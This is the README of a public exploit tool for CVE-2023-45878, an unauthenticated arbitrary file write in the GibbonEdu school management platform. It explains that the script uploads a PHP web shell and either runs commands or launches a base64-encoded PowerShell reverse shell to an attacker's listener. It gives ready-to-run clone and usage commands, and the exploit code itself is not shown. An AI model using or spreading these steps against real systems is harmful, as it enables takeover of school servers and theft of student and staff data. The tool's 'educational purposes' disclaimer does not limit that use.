GibbonEdu Arbitrary File Write to Remote Code Execution# CVE-2023-45878
**GibbonEdu Arbitrary File Write to Web Shell Execution**
## Description
This repository contains an exploit for **CVE-2023-45878**, an arbitrary file write vulnerability in [GibbonEdu](https://gibbonedu.org/). The vulnerability affects the `rubrics_visualise_saveAjax.php` endpoint and allows an unauthenticated attacker to upload arbitrary files to the web server.
This script leverages the vulnerability to upload a **PHP web shell** and either:
- Execute a **specific system command**;
- Trigger a **base64-encoded PowerShell reverse shell** to gain remote access.
---
## Usage
The script supports two modes of operation:
- `--command` (`-c`): Execute a specific system command remotely.
- `--shell` (`-s`): Trigger a PowerShell reverse shell to the attacker's listener.
---
## How to Run the Exploit
### 1. Clone the Repository
```bash
git clone https://github.com/davidzzo23/CVE-2023-45878.git
cd CVE-2023-45878
```
### 2. Run the Web Shell Exploit
- Run a Remote Command:
```bash
python3 CVE-2023-45878.py -t <target_domain> -c "whoami"
```
- Trigger a PowerShell Reverse Shell:
```bash
python3 CVE-2023-45878.py -t <target_domain> -s -i <ip> -p <port>
```
## Disclaimer
This script is intended for educational purposes only. Unauthorized use of this exploit on systems without permission is illegal. The author is not responsible for any misuse or damages caused by this exploit.
[4.0K] /data/pocs/1213201c9c51680ebbcb1a96e8e6c5a3aba5999b
├── [3.6K] CVE-2023-45878.py
└── [1.4K] README.md
0 directories, 2 files